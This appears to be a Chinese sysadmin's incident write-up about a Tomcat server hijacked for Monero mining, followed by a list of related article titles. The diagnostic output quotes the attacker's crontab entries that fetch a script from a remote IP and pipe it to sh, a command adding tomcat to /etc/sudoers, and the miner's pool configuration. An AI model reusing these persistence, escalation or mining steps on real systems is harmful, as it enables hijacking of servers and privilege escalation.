Tomcat应用服务器被黑客 肉鸡攻击 记录
来源:互联网 发布:软件如何设计接口 编辑:程序博客网 时间:2024/05/01 08:51
线上一台应用服务器报警,负载过高,这个就诡异了,因为只是一个普通的服务器,应用使用人员不到10个人,咋会负载高,肯定有问题哪,登陆上去查看,
top查看哪个占据的cpu资源比较多
[root@aew01~]# toptop - 14:27:49 up 423 days, 22:48, 3 users, load average: 2.10, 1.85, 1.66Tasks: 166 total, 1 running, 164 sleeping, 0 stopped, 1 zombieCpu0 : 45.4%us, 0.8%sy, 0.0%ni, 53.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%stCpu1 : 38.2%us, 0.8%sy, 0.0%ni, 59.8%id, 0.0%wa, 0.0%hi, 1.2%si, 0.0%stMem: 14389372k total, 14233284k used, 156088k free, 12388k buffersSwap: 33554428k total, 1511980k used, 32042448k free, 40140k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 39674 tomcat 20 0 223m 2808 412 S 75.0 0.0 4031:53 atd 54892 tomcat 20 0 10.1g 3.6g 4816 S 4.6 26.4 969:07.52 java [tomcat@aew01~]$ crontab -l */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh[tomcat@aew01~]$
看到有一个atd进程,这是什么鬼? 查看atd进程
[root@aew01~]# ps -eaf|grep 39674root 39023 37026 0 14:28 pts/0 00:00:00 grep 39674tomcat 39674 1 85 Jul15 ? 2-19:12:05 ./atd -c bmsnxvpggm.conf -t 1[root@aew01~]#
再查看atd执行脚本组件,看到是一个编译之后的可执行组件
[root@aew01~]# find / -name atd/usr/sbin/atd/etc/sysconfig/atd/etc/pam.d/atd/etc/rc.d/init.d/atd/var/tmp/atd[root@aew01~]# more /usr/sbin/atd******** /usr/sbin/atd: Not a text file ********[root@aew01~]#
查看配置文件bmsnxvpggm.conf
[root@aew01~]# more /var/tmp/bmsnxvpggm.conf{ "url" : "stratum+tcp://94.23.41.130:80", "user" : "49mQCzecsC6TS1sNBj5XQX4dNG8MESvLGLPHYJLKohVCQivAB5jJw2xHokTpjtSfE3D8m2U3JjDGEWJMYLrN216CM3dRpBt", "pass" : "x", "algo" : "cryptonight", "quiet" : true}[root@aew01~]#
看来是被盯上了,攻击了。kill掉进程
[root@aew01~]# kill -9 39979[root@aew01~]# ps -eaf|grep atdroot 40917 37026 0 14:48 pts/0 00:00:00 grep atd[root@aew01~]#
然后负载降下来了,但是可恶的是,不到5分钟,负载又上来了,一看又是atd这个进程在运行,进去查看tomcat的crontab任务,发现已经被写进crontab任务了,于是注释掉crontab任务。
[tomcat@aew01~]$ crontab -l */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh [tomcat@aew01~]$
然后又查看历史操作,有这样一个命令echo “tomcat ALL=(ALL) ALL” >> /etc/sudoers曾经被执行过
echo “tomcat ALL=(ALL) ALL” >> /etc/sudoers
,于是,为了安全起见,进配置/etc/sudoers文件里面,注释掉 #tomcat ALL=(ALL) ALL这一行,然后重启tomcat应用程序。
彻底检查了下应用服务器所对于的db服务器,发现db没有被攻击,各种数据账号安全,又迅速修改了数据库账号密码等等。
BTY:最终的彻底的解解决方案还是需要应用开发人员,堵住tomcat的漏洞,避免黑客使用tomcat漏洞获得应用服务器的tomcat账号权限,进而登陆应用服务器,将应用服务器做成肉鸡,不停的往外发包。
阅读全文
13 5
- Tomcat应用服务器被黑客 肉鸡攻击 记录
- 我遇到的肉鸡(黑客)攻击
- Linux服务器被黑客攻击的检测
- 阿里云ECS服务器提示肉鸡行为的解决记录
- linux服务器被当肉鸡过程
- 服务器被入侵当做挖矿肉鸡
- 知己知彼 黑客如何攻击Windows服务器
- 黑客攻击WEB服务器的常用方式
- 大量电脑沦为肉鸡集体攻击云服务器 电脑管家率先查杀暗云III
- 百度今晨被黑客攻击
- 服务器肉鸡解决过程
- 百度遭黑客攻击陷入瘫痪 DNS解析记录被篡改
- Mail.ru论坛遭黑客攻击 超过2500万用户记录被窃
- 记录阿里云被肉鸡的破解方法
- 黑客攻击
- 韩购物网站服务器遭黑客攻击 千万用户信息被泄
- 根据Web服务器记录来追击黑客
- 根据Web服务器记录追踪黑客
- Android测试-unitTest
- oracle-日常小计——oracle cmd 命令行形式导入 sql文件
- c语言下如果动态获取指针型数组存放数量大小
- 编写可读代码艺术笔记
- Android ContentResolver 获取手机联系人
- Tomcat应用服务器被黑客 肉鸡攻击 记录
- 机器学习中的bias和variance、欠拟合和过拟合
- TensorFlow运作方式入门
- Linux拷贝
- 控制器的生命周期
- (78)Collection类:reverseOrder
- 软件项目需求分析:非功能性六大点
- SpringMVC与Struts2的对比
- selenium报错